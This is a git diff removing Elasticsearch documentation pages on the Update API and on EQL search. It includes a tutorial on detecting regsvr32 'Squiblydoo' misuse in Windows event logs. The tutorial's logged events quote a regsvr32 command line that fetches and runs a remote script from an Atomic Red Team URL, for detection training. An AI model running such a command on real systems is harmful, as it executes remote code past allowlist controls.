diff --git a/docs/reference/docs/update.asciidoc b/docs/reference/docs/update.asciidoc deleted file mode 100644 index a4998eab61d..00000000000 --- a/docs/reference/docs/update.asciidoc +++ /dev/null @@ -1,360 +0,0 @@ -[[docs-update]] -=== Update API -++++ -Update -++++ - -Updates a document using the specified script. - -[[docs-update-api-request]] -==== {api-request-title} - -`POST //_update/<_id>` - -[[docs-update-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `index` or -`write` <> for the target index or -index alias. - -[[update-api-desc]] -==== {api-description-title} - -Enables you to script document updates. The script can update, delete, or skip -modifying the document. The update API also supports passing a partial document, -which is merged into the existing document. To fully replace an existing -document, use the <>. - -This operation: - -. Gets the document (collocated with the shard) from the index. -. Runs the specified script. -. Indexes the result. - -The document must still be reindexed, but using `update` removes some network -roundtrips and reduces chances of version conflicts between the GET and the -index operation. - -The `_source` field must be enabled to use `update`. In addition to `_source`, -you can access the following variables through the `ctx` map: `_index`, -`_type`, `_id`, `_version`, `_routing`, and `_now` (the current timestamp). - -[[docs-update-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the target index. By default, the index is created -automatically if it doesn't exist. For more information, see <>. - -`<_id>`:: -(Required, string) Unique identifier for the document to be updated. - -[[docs-update-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_seq_no] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_primary_term] - -`lang`:: -(Optional, string) The script language. Default: `painless`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=require-alias] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -`retry_on_conflict`:: -(Optional, integer) Specify how many times should the operation be retried when - a conflict occurs. Default: 0. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`_source`:: -(Optional, list) Set to `false` to disable source retrieval (default: `true`). -You can also specify a comma-separated list of the fields you want to retrieve. - -`_source_excludes`:: -(Optional, list) Specify the source fields you want to exclude. - -`_source_includes`:: -(Optional, list) Specify the source fields you want to retrieve. - -`timeout`:: -+ --- -(Optional, <>) -Period to wait for the following operations: - -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. 
--- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[update-api-example]] -==== {api-examples-title} - -First, let's index a simple doc: - -[source,console] --------------------------------------------------- -PUT test/_doc/1 -{ - "counter" : 1, - "tags" : ["red"] -} --------------------------------------------------- - -To increment the counter, you can submit an update request with the -following script: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script" : { - "source": "ctx._source.counter += params.count", - "lang": "painless", - "params" : { - "count" : 4 - } - } -} --------------------------------------------------- -// TEST[continued] - -Similarly, you could use and update script to add a tag to the list of tags -(this is just a list, so the tag is added even it exists): - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "ctx._source.tags.add(params.tag)", - "lang": "painless", - "params": { - "tag": "blue" - } - } -} --------------------------------------------------- -// TEST[continued] - -You could also remove a tag from the list of tags. The Painless -function to `remove` a tag takes the array index of the element -you want to remove. To avoid a possible runtime error, you first need to -make sure the tag exists. If the list contains duplicates of the tag, this -script just removes one occurrence. - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "if (ctx._source.tags.contains(params.tag)) { ctx._source.tags.remove(ctx._source.tags.indexOf(params.tag)) }", - "lang": "painless", - "params": { - "tag": "blue" - } - } -} --------------------------------------------------- -// TEST[continued] - -You can also add and remove fields from a document. For example, this script -adds the field `new_field`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script" : "ctx._source.new_field = 'value_of_new_field'" -} --------------------------------------------------- -// TEST[continued] - -Conversely, this script removes the field `new_field`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script" : "ctx._source.remove('new_field')" -} --------------------------------------------------- -// TEST[continued] - -Instead of updating the document, you can also change the operation that is -executed from within the script. For example, this request deletes the doc if -the `tags` field contains `green`, otherwise it does nothing (`noop`): - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "if (ctx._source.tags.contains(params.tag)) { ctx.op = 'delete' } else { ctx.op = 'none' }", - "lang": "painless", - "params": { - "tag": "green" - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -===== Update part of a document - -The following partial update adds a new field to the -existing document: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - } -} --------------------------------------------------- -// TEST[continued] - -If both `doc` and `script` are specified, then `doc` is ignored. If you -specify a scripted update, include the fields you want to update in the script. 
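Note that a partial document is merged recursively with the existing source: sub-objects are combined field by field, while scalar and array values in `doc` replace the existing values outright. As a sketch (the `address` object here is hypothetical and not part of the `test` document created above):

[source,console]
----
POST test/_update/1
{
  "doc": {
    "address": {
      "city": "Amsterdam"
    }
  }
}
----
// TEST[skip:illustrative sketch, not part of the tested examples]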
- -[discrete] -===== Detect noop updates - -By default updates that don't change anything detect that they don't change -anything and return `"result": "noop"`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - } -} --------------------------------------------------- -// TEST[continued] - -If the value of `name` is already `new_name`, the update -request is ignored and the `result` element in the response returns `noop`: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 0, - "successful": 0, - "failed": 0 - }, - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 7, - "_primary_term": 1, - "_seq_no": 6, - "result": "noop" -} --------------------------------------------------- - -You can disable this behavior by setting `"detect_noop": false`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - }, - "detect_noop": false -} --------------------------------------------------- -// TEST[continued] - -[[upserts]] -[discrete] -===== Upsert - -If the document does not already exist, the contents of the `upsert` element -are inserted as a new document. If the document exists, the -`script` is executed: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "ctx._source.counter += params.count", - "lang": "painless", - "params": { - "count": 4 - } - }, - "upsert": { - "counter": 1 - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -[[scripted_upsert]] -===== Scripted upsert - -To run the script whether or not the document exists, set `scripted_upsert` to -`true`: - -[source,console] --------------------------------------------------- -POST sessions/_update/dh3sgudg8gsrgl -{ - "scripted_upsert": true, - "script": { - "id": "my_web_session_summariser", - "params": { - "pageViewEvent": { - "url": "foo.com/bar", - "response": 404, - "time": "2014-01-01 12:32" - } - } - }, - "upsert": {} -} --------------------------------------------------- -// TEST[s/"id": "my_web_session_summariser"/"source": "ctx._source.page_view_event = params.pageViewEvent"/] -// TEST[continued] - -[discrete] -[[doc_as_upsert]] -===== Doc as upsert - -Instead of sending a partial `doc` plus an `upsert` doc, you can set -`doc_as_upsert` to `true` to use the contents of `doc` as the `upsert` -value: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - }, - "doc_as_upsert": true -} --------------------------------------------------- -// TEST[continued] -[NOTE] -==== -Using <> with `doc_as_upsert` is not supported. -==== diff --git a/docs/reference/eql/delete-async-eql-search-api.asciidoc b/docs/reference/eql/delete-async-eql-search-api.asciidoc deleted file mode 100644 index 107b3609d55..00000000000 --- a/docs/reference/eql/delete-async-eql-search-api.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[delete-async-eql-search-api]] -=== Delete async EQL search API -++++ -Delete async EQL search -++++ - -beta::[] - -Deletes an <> or a -<>. The API also -deletes results for the search. 
- -[source,console] ----- -DELETE /_eql/search/FkpMRkJGS1gzVDRlM3g4ZzMyRGlLbkEaTXlJZHdNT09TU2VTZVBoNDM3cFZMUToxMDM= ----- -// TEST[skip: no access to search ID] - -[[delete-async-eql-search-api-request]] -==== {api-request-title} - -`DELETE /_eql/search/` - -[[delete-async-eql-search-api-prereqs]] -==== {api-prereq-title} - -See <>. - -[[delete-async-eql-search-api-limitations]] -===== Limitations - -See <>. - -[[delete-async-eql-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Identifier for the search to delete. -+ -A search ID is provided in the <>'s response for -an <>. A search ID is also provided if the -request's <> parameter -is `true`. diff --git a/docs/reference/eql/detect-threats-with-eql.asciidoc b/docs/reference/eql/detect-threats-with-eql.asciidoc deleted file mode 100644 index ccf8d92658d..00000000000 --- a/docs/reference/eql/detect-threats-with-eql.asciidoc +++ /dev/null @@ -1,387 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-ex-threat-detection]] -== Example: Detect threats with EQL - -beta::[] - -This example tutorial shows how you can use EQL to detect security threats and -other suspicious behavior. In the scenario, you're tasked with detecting -https://attack.mitre.org/techniques/T1218/010/[regsvr32 misuse] in Windows event -logs. - -`regsvr32.exe` is a built-in command-line utility used to register `.dll` -libraries in Windows. As a native tool, `regsvr32.exe` has a trusted status, -letting it bypass most allowlist software and script blockers. -Attackers with access to a user's command line can use `regsvr32.exe` to run -malicious scripts via `.dll` libraries, even on machines that otherwise -disallow such scripts. - -One common variant of regsvr32 misuse is a -https://attack.mitre.org/techniques/T1218/010/[Squiblydoo attack]. In a -Squiblydoo attack, a `regsvr32.exe` command uses the `scrobj.dll` library to -register and run a remote script. These commands often look like this: - -[source,sh] ----- -"regsvr32.exe /s /u /i: scrobj.dll" ----- - -[discrete] -[[eql-ex-threat-detection-setup]] -=== Setup - -This tutorial uses a test dataset from -https://github.com/redcanaryco/atomic-red-team[Atomic Red Team] that includes -events imitating a Squiblydoo attack. The data has been mapped to -{ecs-ref}[Elastic Common Schema (ECS)] fields. - -To get started: - -. Download https://raw.githubusercontent.com/elastic/elasticsearch/{branch}/docs/src/test/resources/normalized-T1117-AtomicRed-regsvr32.json[`normalized-T1117-AtomicRed-regsvr32.json`]. - -. Use the <> to index the data: -+ -[source,sh] ----- -curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-index-000001/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json" ----- -// NOTCONSOLE - -. Use the <> to verify the data was indexed: -+ -[source,console] ----- -GET /_cat/indices/my-index-000001?v=true&h=health,status,index,docs.count ----- -// TEST[setup:atomic_red_regsvr32] -+ -The response should show a `docs.count` of `150`. 
-+ -[source,txt] ----- -health status index docs.count -yellow open my-index-000001 150 ----- -// TESTRESPONSE[non_json] - -[discrete] -[[eql-ex-get-a-count-of-regsvr32-events]] -=== Get a count of regsvr32 events - -First, get a count of events associated with a `regsvr32.exe` process: - -[source,console] ----- -GET /my-index-000001/_eql/search?filter_path=-hits.events <1> -{ - "query": """ - any where process.name == "regsvr32.exe" <2> - """, - "size": 200 <3> -} ----- -// TEST[setup:atomic_red_regsvr32] - -<1> `?filter_path=-hits.events` excludes the `hits.events` property from the -response. This search is only intended to get an event count, not a list of -matching events. -<2> Matches any event with a `process.name` of `regsvr32.exe`. -<3> Returns up to 200 hits for matching events. - -The response returns 143 related events. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 143, - "relation": "eq" - } - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] - -[discrete] -[[eql-ex-check-for-command-line-artifacts]] -=== Check for command line artifacts - -`regsvr32.exe` processes were associated with 143 events. But how was -`regsvr32.exe` first called? And who called it? `regsvr32.exe` is a command-line -utility. Narrow your results to processes where the command line was used: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" and process.command_line.keyword != null - """ -} ----- -// TEST[setup:atomic_red_regsvr32] - -The query matches one event with an `event.type` of `creation`, indicating the -start of a `regsvr32.exe` process. Based on the event's `process.command_line` -value, `regsvr32.exe` used `scrobj.dll` to register a script, `RegSvr32.sct`. -This fits the behavior of a Squiblydoo attack. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 21, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 21/"took": $body.took/] -// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/] - -[discrete] -[[eql-ex-check-for-malicious-script-loads]] -=== Check for malicious script loads - -Check if `regsvr32.exe` later loads the `scrobj.dll` library: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll" - """ -} ----- -// TEST[setup:atomic_red_regsvr32] - -The query matches an event, confirming `scrobj.dll` was loaded. 
- -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 5, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 5/"took": $body.took/] -// TESTRESPONSE[s/"_id": "ol5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/] - -[discrete] -[[eql-ex-detemine-likelihood-of-success]] -=== Determine the likelihood of success - -In many cases, attackers use malicious scripts to connect to remote servers or -download other files. Use an <> to check -for the following series of events: - -. A `regsvr32.exe` process -. A load of the `scrobj.dll` library by the same process -. Any network event by the same process - -Based on the command line value seen in the previous response, you can expect to -find a match. However, this query isn't designed for that specific command. -Instead, it looks for a pattern of suspicious behavior that's generic enough to -detect similar threats. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid - [process where process.name == "regsvr32.exe"] - [library where dll.name == "scrobj.dll"] - [network where true] - """ -} ----- -// TEST[setup:atomic_red_regsvr32] - -The query matches a sequence, indicating the attack likely succeeded. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 25, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": "my-index-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - }, - { - "_index": "my-index-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - }, - { - "_index": "my-index-000001", - "_id": "EF5MJXMBMk1dGnErnBa9", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573238680000, - "destination": { - "address": 
"151.101.48.133", - "port": "443" - }, - "source": { - "address": "192.168.162.134", - "port": "50505" - }, - "event": { - "category": "network" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - }, - "network": { - "protocol": "tcp", - "direction": "outbound" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 25/"took": $body.took/] -// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "ol5MJXMBMk1dGnErnBW8"/"_id": $body.hits.sequences.0.events.1._id/] -// TESTRESPONSE[s/"_id": "EF5MJXMBMk1dGnErnBa9"/"_id": $body.hits.sequences.0.events.2._id/] diff --git a/docs/reference/eql/eql-search-api.asciidoc b/docs/reference/eql/eql-search-api.asciidoc deleted file mode 100644 index 52a04be94e9..00000000000 --- a/docs/reference/eql/eql-search-api.asciidoc +++ /dev/null @@ -1,679 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[eql-search-api]] -=== EQL search API -++++ -EQL search -++++ - -beta::[] - -Returns search results for an <> query. - -EQL assumes each document in a data stream or index corresponds to an -event. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" - """ -} ----- -// TEST[setup:sec_logs] - -[[eql-search-api-request]] -==== {api-request-title} - -`GET //_eql/search` - -`POST //_eql/search` - -[[eql-search-api-prereqs]] -==== {api-prereq-title} - -See <>. - -[[eql-search-api-limitations]] -===== Limitations - -See <>. - -[[eql-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, or <> used to limit the request. Accepts wildcard (`*`) expressions. -+ -To search all data streams and indices in a cluster, use -`_all` or `*`. - -[[eql-search-api-query-params]] -==== {api-query-parms-title} - -`allow_no_indices`:: -(Optional, Boolean) -+ -NOTE: This parameter's behavior differs from the `allow_no_indices` parameter -used in other <>. -+ -If `false`, the request returns an error if any wildcard expression, -<>, or `_all` value targets only missing or closed -indices. This behavior applies even if the request targets other open indices. -For example, a request targeting `foo*,bar*` returns an error if an index -starts with `foo` but no index starts with `bar`. -+ -If `true`, only requests that exclusively target missing or closed indices -return an error. For example, a request targeting `foo*,bar*` does not return an -error if an index starts with `foo` but no index starts with `bar`. However, a -request that targets only `bar*` still returns an error. -+ -Defaults to `true`. - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`ignore_unavailable`:: -(Optional, Boolean) If `true`, missing or closed indices are not included in the -response. Defaults to `true`. - -`keep_alive`:: -+ --- -(Optional, <>) -Period for which the search and its results are stored on the cluster. Defaults -to `5d` (five days). - -When this period expires, the search and its results are deleted, even if the -search is still ongoing. - -If the <> parameter is -`false`, {es} only stores <> that do not -complete within the period set by the -<> -parameter, regardless of this value. - -[IMPORTANT] -==== -You can also specify this value using the `keep_alive` request body parameter. -If both parameters are specified, only the query parameter is used. 
-==== --- - -`keep_on_completion`:: -+ --- -(Optional, Boolean) -If `true`, the search and its results are stored on the cluster. - -If `false`, the search and its results are stored on the cluster only if the -request does not complete during the period set by the -<> -parameter. Defaults to `false`. - -[IMPORTANT] -==== -You can also specify this value using the `keep_on_completion` request body -parameter. If both parameters are specified, only the query parameter is used. -==== --- - -`wait_for_completion_timeout`:: -+ --- -(Optional, <>) -Timeout duration to wait for the request to finish. Defaults to no -timeout, meaning the request waits for complete search results. - -If this parameter is specified and the request completes during this period, -complete search results are returned. - -If the request does not complete during this period, the search becomes an -<>. - -[IMPORTANT] -==== -You can also specify this value using the `wait_for_completion_timeout` request -body parameter. If both parameters are specified, only the query parameter is -used. -==== --- - -[role="child_attributes"] -[[eql-search-api-request-body]] -==== {api-request-body-title} - -`event_category_field`:: -(Required*, string) -Field containing the event classification, such as `process`, `file`, or -`network`. -+ -Defaults to `event.category`, as defined in the {ecs-ref}/ecs-event.html[Elastic -Common Schema (ECS)]. If a data stream or index does not contain the -`event.category` field, this value is required. -+ -The event category field must be mapped as a field type in the -<> family. - -`fetch_size`:: -(Optional, integer) -Maximum number of events to search at a time for sequence queries. Defaults to -`1000`. -+ -This value must be greater than `2` but cannot exceed the value of the -<> setting, which defaults to -`10000`. -+ -Internally, a sequence query fetches and paginates sets of events to search for -matches. This parameter controls the size of those sets. This parameter does not -limit the total number of events searched or the number of matching events -returned. -+ -A greater `fetch_size` value often increases search speed but uses more memory. - -`filter`:: -(Optional, <>) -Query, written in query DSL, used to filter the events on which the EQL query -runs. - -`keep_alive`:: -+ --- -(Optional, <>) -Period for which the search and its results are stored on the cluster. Defaults -to `5d` (five days). - -When this period expires, the search and its results are deleted, even if the -search is still ongoing. - -If the <> parameter is -`false`, {es} only stores <> that do not -complete within the period set by the -<> -parameter, regardless of this value. - -[IMPORTANT] -==== -You can also specify this value using the `keep_alive` query parameter. -If both parameters are specified, only the query parameter is used. -==== --- - -[[eql-search-api-keep-on-completion]] -`keep_on_completion`:: -+ --- -(Optional, Boolean) -If `true`, the search and its results are stored on the cluster. - -If `false`, the search and its results are stored on the cluster only if the -request does not complete during the period set by the -<> -parameter. Defaults to `false`. - -[IMPORTANT] -==== -You can also specify this value using the `keep_on_completion` query parameter. -If both parameters are specified, only the query parameter is used. -==== --- - -[[eql-search-api-request-query-param]] -`query`:: -(Required, string) -<> query you wish to run. 
- -`result_position`:: -(Optional, enum) -Set of matching events or sequences to return. -+ -.Valid values for `result_position` -[%collapsible%open] -==== -`head`:: -(Default) -Return the earliest matches, similar to the {wikipedia}/Head_(Unix)[Unix head -command]. - -`tail`:: -Return the most recent matches, similar to the {wikipedia}/Tail_(Unix)[Unix tail -command]. -==== -+ -NOTE: This parameter may change the set of returned hits. However, it does not -change the sort order of hits in the response. - -`size`:: -(Optional, integer or float) -For <>, the maximum number of matching events to -return. -+ -For <>, the maximum number of matching sequences -to return. -+ -Defaults to `10`. This value must be greater than `0`. -+ -NOTE: You cannot use <>, such as `head` or `tail`, to exceed -this value. - -[[eql-search-api-tiebreaker-field]] -`tiebreaker_field`:: -(Optional, string) -Field used to sort hits with the same -<> in ascending order. See -<>. - -[[eql-search-api-timestamp-field]] -`timestamp_field`:: -+ --- -(Required*, string) -Field containing event timestamp. - -Defaults to `@timestamp`, as defined in the -{ecs-ref}/ecs-event.html[Elastic Common Schema (ECS)]. If a data stream or index -does not contain the `@timestamp` field, this value is required. - -Events in the API response are sorted by this field's value, converted to -milliseconds since the {wikipedia}/Unix_time[Unix epoch], in -ascending order. - -The timestamp field should be mapped as a <>. The -<> field type is not supported. --- - -[[eql-search-api-wait-for-completion-timeout]] -`wait_for_completion_timeout`:: -+ --- -(Optional, <>) -Timeout duration to wait for the request to finish. Defaults to no -timeout, meaning the request waits for complete search results. - -If this parameter is specified and the request completes during this period, -complete search results are returned. - -If the request does not complete during this period, the search becomes an -<>. - -[IMPORTANT] -==== -You can also specify this value using the `wait_for_completion_timeout` query -parameter. If both parameters are specified, only the query parameter is used. -==== --- - -[role="child_attributes"] -[[eql-search-api-response-body]] -==== {api-response-body-title} - -[[eql-search-api-response-body-search-id]] -`id`:: -+ --- -(string) -Identifier for the search. - -This search ID is only provided if one of the following conditions is met: - -* A search request does not return complete results during the - <> - parameter's timeout period, becoming an <>. - -* The search request's <> - parameter is `true`. - -You can use this ID with the <> to get the current status and available results for the search. --- - -`is_partial`:: -(Boolean) -If `true`, the response does not contain complete search results. - -`is_running`:: -+ --- -(Boolean) -If `true`, the search request is still executing. - -[IMPORTANT] -==== -If this parameter and the `is_partial` parameter are `true`, the search is an -<>. If the `keep_alive` period does not -pass, the complete search results will be available when the search completes. - -If `is_partial` is `true` but `is_running` is `false`, the search returned -partial results due to a failure. Only some shards returned results or the node -coordinating the search failed. -==== --- - -`took`:: -+ --- -(integer) -Milliseconds it took {es} to execute the request. 
- -This value is calculated by measuring the time elapsed -between receipt of a request on the coordinating node -and the time at which the coordinating node is ready to send the response. - -Took time includes: - -* Communication time between the coordinating node and data nodes -* Time the request spends in the `search` <>, - queued for execution -* Actual execution time - -Took time does *not* include: - -* Time needed to send the request to {es} -* Time needed to serialize the JSON response -* Time needed to send the response to a client --- - -`timed_out`:: -(Boolean) -If `true`, the request timed out before completion. - -`hits`:: -(object) -Contains matching events and sequences. Also contains related metadata. -+ -.Properties of `hits` -[%collapsible%open] -==== - -`total`:: -(object) -Metadata about the number of matching events or sequences. -+ -.Properties of `total` -[%collapsible%open] -===== - -`value`:: -(integer) -For <>, the total number of matching events. -+ -For <>, the total number of matching sequences. - -`relation`:: -+ --- -(string) -Indicates whether the number of events or sequences returned is accurate or a -lower bound. - -Returned values are: - -`eq`::: Accurate -`gte`::: Lower bound, including returned events or sequences --- -===== - -`sequences`:: -(array of objects) -Contains event sequences matching the query. Each object represents a -matching sequence. This parameter is only returned for EQL queries containing -a <>. -+ -.Properties of `sequences` objects -[%collapsible%open] -===== -`join_keys`:: -(array of values) -Shared field values used to constrain matches in the sequence. These are defined -using the <> in the EQL query syntax. - -`events`:: -(array of objects) -Contains events matching the query. Each object represents a -matching event. -+ -.Properties of `events` objects -[%collapsible%open] -====== -`_index`:: -(string) -Name of the index containing the event. - -`_id`:: -(string) -Unique identifier for the event. -This ID is only unique within the index. - -`_source`:: -(object) -Original JSON body passed for the event at index time. -====== -===== - -[[eql-search-api-response-events]] -`events`:: -(array of objects) -Contains events matching the query. Each object represents a -matching event. -+ -.Properties of `events` objects -[%collapsible%open] -===== -`_index`:: -(string) -Name of the index containing the event. - -`_id`:: -(string) -(string) -Unique identifier for the event. -This ID is only unique within the index. - -`_source`:: -(object) -Original JSON body passed for the event at index time. -===== -==== - -[[eql-search-api-example]] -==== {api-examples-title} - -[[eql-search-api-basic-query-ex]] -===== Basic query example - -The following EQL search request searches for events with an `event.category` of -`process` that meet the following conditions: - -* A `process.name` of `cmd.exe` -* An `process.pid` other than `2013` - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where (process.name == "cmd.exe" and process.pid != 2013) - """ -} ----- -// TEST[setup:sec_logs] - -The API returns the following response. Matching events in the `hits.events` -property are sorted by <>, converted -to milliseconds since the {wikipedia}/Unix_time[Unix epoch], -in ascending order. - -If two or more events share the same timestamp, the -<> field is used to sort -the events in ascending order. 
- -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 6, - "timed_out": false, - "hits": { - "total": { - "value": 2, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "babI3XMBI9IjHuIqU0S_", - "_source": { - "@timestamp": "2099-12-06T11:04:05.000Z", - "event": { - "category": "process", - "id": "edwCRnyD", - "sequence": 1 - }, - "process": { - "pid": 2012, - "name": "cmd.exe", - "executable": "C:\\Windows\\System32\\cmd.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "b6bI3XMBI9IjHuIqU0S_", - "_source": { - "@timestamp": "2099-12-07T11:06:07.000Z", - "event": { - "category": "process", - "id": "cMyt5SZ2", - "sequence": 3 - }, - "process": { - "pid": 2012, - "name": "cmd.exe", - "executable": "C:\\Windows\\System32\\cmd.exe" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 6/"took": $body.took/] -// TESTRESPONSE[s/"_id": "babI3XMBI9IjHuIqU0S_"/"_id": $body.hits.events.0._id/] -// TESTRESPONSE[s/"_id": "b6bI3XMBI9IjHuIqU0S_"/"_id": $body.hits.events.1._id/] - -[[eql-search-api-sequence-ex]] -===== Sequence query example - -The following EQL search request matches a <> of events -that: - -. Start with an event with: -+ --- -* An `event.category` of `file` -* A `file.name` of `cmd.exe` -* An `process.pid` other than `2013` --- -. Followed by an event with: -+ --- -* An `event.category` of `process` -* A `process.executable` that contains the substring `regsvr32` --- - -These events must also share the same `process.pid` value. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid - [ file where file.name == "cmd.exe" and process.pid != 2013 ] - [ process where stringContains(process.executable, "regsvr32") ] - """ -} ----- -// TEST[setup:sec_logs] - -The API returns the following response. Matching sequences are included in the -`hits.sequences` property. The `hits.sequences.join_keys` property contains the -shared `process.pid` value for each matching event. 
